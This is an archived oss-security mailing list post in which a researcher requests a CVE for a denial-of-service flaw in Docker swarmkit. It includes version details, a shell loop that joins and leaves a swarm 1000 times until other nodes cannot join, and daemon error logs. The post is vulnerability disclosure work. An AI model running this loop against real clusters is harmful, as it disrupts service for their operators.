[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster
From: å¼ å¼€ç <zhangkaixiang () 360 ! cn>
Date: 2016-07-29 9:47:31
Message-ID: 5EDB84F4B23F5B4DB6500A89258280E0BD067A () EX02 ! corp ! qihoo ! net
[Download RAW message or body]
[Attachment #2 (text/plain)]
Docker swarmkit is used to form a swarm, coordinating tasks. Once a machine joins, it becomes a \
Swarm Node. Nodes can either be worker nodes or manager nodes. I found a vulnerability in \
docker of the latest version which could cause a Denial of Service, it results in a machine \
could not join the swarm cluster after another node's repeatedly joining and quitting the swarm \
for many times(taking my testing as example , it should need at least one thousand times. \
)Moreover, the docker debugging info indicates the Dispatcher is stopped and ca server may \
exited sometimes.
# docker version
Client:
Version: 1.12.0-dev
API version: 1.25
Go version: go1.6.3
Git commit: 9c1be54-unsupported
Built: Fri Jul 29 15:40:52 2016
OS/Arch: linux/amd64
Server:
Version: 1.12.0-dev
API version: 1.25
Go version: go1.6.3
Git commit: 9c1be54-unsupported
Built: Fri Jul 29 15:40:52 2016
OS/Arch: linux/amd64
# docker swarm init
Swarm initialized: current node (23m6ksr96whsvuo8lzokenju3) is now a manager.
To add a worker to this swarm, run the following command:
docker swarm join \
--token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
\ xx.xx.xx.xx:2377
To add a manager to this swarm, run the following command:
docker swarm join \
--token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-0p086z2sdbnpvognjmu76gpi6 \
\ xx.xx.xx.xx :2377
Login machine A1 and join the swarm ,and then quitted the swarm.
-----------------------------------------------------
# docker swarm join --token \
SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
xx.xx.xx.xx:2377 This node joined a swarm as a worker.
# docker swarm leave --force
Node left the swarm.
Login machine A2 , repeatedly join and quit the swarm for 1000 times.
-----------------------------------------------------
# for i in {1..1000}; do docker swarm leave --force ; docker swarm join --token \
SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
xx.xx.xx.xx:2377 ;done This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
After finishing that, Login machine A1 again and attempt to join the swarm, it failed.
--------------------------------------------------------
# docker swarm join --token \
SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
xx.xx.xx.xx:2377 Error response from daemon: Timeout was reached before node was joined. \
Attempt to join the cluster will continue in the background. Use "docker info" command to see \
the current swarm status of your node.
Some debugging information of docker daemon.
---------------------------------------------------------
time="2016-07-29T15:24:02.374560815+08:00" level=error msg="failed to remove node" error="rpc \
error: code = 10 desc = dispatcher is stopped" method="(*Dispatcher).Session" \
node.id=b11ta5p8g2wgy10vyzgsi6ocm node.session=1aph8scsewn89j3h5o3emgdql \
time="2016-07-29T15:24:02.374604898+08:00" level=error msg=" session failed" error="rpc error: \
code = 1 desc = context canceled" module=agent
time="2016-07-29T15:24:14.069347074+08:00" level=debug msg="heartbeat expiration"
time="2016-07-29T15:24:14.069428834+08:00" level=error msg="failed deregistering node after \
heartbeat expiration" error="rpc error: code = 10 desc = dispatcher is stopped" … …
Please assign CVE IDs for the security issue ?
Best regards&
Kaixiang Zhang of the Cloud Security Team, Qihoo 360
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic